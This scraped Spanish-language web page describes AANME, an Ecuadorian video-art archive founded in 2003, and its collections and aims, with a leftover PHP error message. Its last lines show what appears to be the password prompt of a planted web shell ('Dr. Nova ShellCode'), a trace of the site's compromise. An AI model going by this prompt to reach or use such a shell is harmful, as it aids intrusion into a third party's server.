AANME (Asociación Archivo Nuevos Medios Ecuador)

Error message

Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in menu_set_active_trail() (line 2292 of /var/www/insularesdivergentes.org/includes/menu.inc).

Es una iniciativa independiente que se desarrolló en 2003. Sin embargo, la investigación se remonta hacia los inicios del uso de la imagen en movimiento como herramienta de expresión artística en el Ecuador, esto es el año 1979. Al momento el archivo sigue la pista de sus artistas y de aquellas instancias que pueden procurar la convocatoria a nuevas propuestas. Es el principal archivo de videoarte del Ecuador, conserva información y documentacion de todo lo que se ha realizado. También cuenta con cuadernos con notas de todas las exposiciones y actividades de videoarte. Mediante cintas, DVDs y un conjunto de libros y catálogos (donde están indicados los proyectos vinculados al videoarte, tanto de muestras locales como internacionales que se han presentado en el Ecuador) teje la historia del videoarte ecuatoriano.
Tiene por objetivos principales la conservación de las obras, como parte de la historia del arte contemporáneo ecuatoriano. Se preocupa además de la difusión, sin fines de lucro, del material a su cargo a nivel nacional e internacional, actividad que realiza bajo el amparo del Convenio de Derechos de Autor que los artistas deben firmar con el archivo como único requisito para ser considerados parte del mismo.
Se compone de copias en formato, mayoritariamente DVD (360 aproximadamente al momento), de las obras de los artistas, sus currículum vitae, soportes conceptuales de las obras, material virtual y/o impreso que la obra haya generado, entrevistas en audio y en formato digital formuladas a los artistas. Posee además algunas copias cedidas por artistas internacionales y una interesante bibliografía sobre el tema de nuevas tecnologías de la imagen.

<xmp><body></xmp><xmp></body></html></xmp>Dr. Nova Login To Shell

Dr. Nova ShellCode
| Please Password |